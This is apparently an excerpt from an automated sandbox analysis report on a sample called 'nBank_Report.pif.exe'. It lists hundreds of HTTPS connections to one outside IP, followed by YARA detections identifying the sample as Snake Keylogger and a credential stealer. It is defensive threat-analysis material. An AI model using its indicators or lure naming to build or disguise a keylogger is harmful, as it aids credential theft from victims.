              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
              Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
              Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
              Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
              Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
              Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
              Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
              Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
              Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
              Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49786 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49787 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49788 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49789 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49790 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49791 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49792 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49793 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49794 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49795 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49796 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49797 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49798 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49799 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49800 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49801 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49802 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49803 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49804 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49805 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49806 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49807 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49808 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49809 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49810 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49811 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49812 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49813 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49814 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49815 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49816 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49817 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49818 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49820 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49821 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49822 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49823 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49824 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49825 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49826 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49827 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49828 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49829 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49830 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49831 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49831 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49832 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49833 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49834 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49835 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49836 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49837 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49838 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49839 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49840 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49841 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49842 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49843 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49844 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49845 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49846 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49847 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49848 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49849 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49850 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49851 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49852 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49853 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49854 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49855 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49856 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49857 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49858 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49859 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49860 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49861 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49862 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49863 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49864 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49865 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49866 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49868 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49869 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49870 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49871 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49872 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49873 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49874 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49875 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49876 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49877 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49878 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49879 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49880 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49881 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49882 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49882 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49883 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49884 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49885 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49886 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49888 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49890 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49892 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49894 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49896 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49898 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49900 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49902 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49904 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49906 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49908 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49910 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49912 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49914 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49916 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49918 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49920 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49922 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49924 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49926 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49928 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49930 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49932 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49934 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49936 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49938 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49940 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49942 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49944 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49946 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49948 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49950 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49952 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49954 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49956 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49958 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49960 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49962 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49964 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49967 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49969 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49971 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49973 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49975 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49977 version: TLS 1.2
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: sslproxydump.pcap, type: PCAPMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.nBank_Report.pif.exe.49954c0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.nBank_Report.pif.exe.49954c0.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.nBank_Report.pif.exe.49954c0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.nBank_Report.pif.exe.49954c0.3.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.nBank_Report.pif.exe.4100c80.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.nBank_Report.pif.exe.4100c80.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.nBank_Report.pif.exe.4100c80.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.nBank_Report.pif.exe.4100c80.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.nBank_Report.pif.exe.49954c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.nBank_Report.pif.exe.49954c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.nBank_Report.pif.exe.49954c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.nBank_Report.pif.exe.49954c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
              Source: 0.2.nBank_Report.pif.exe.4100c80.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
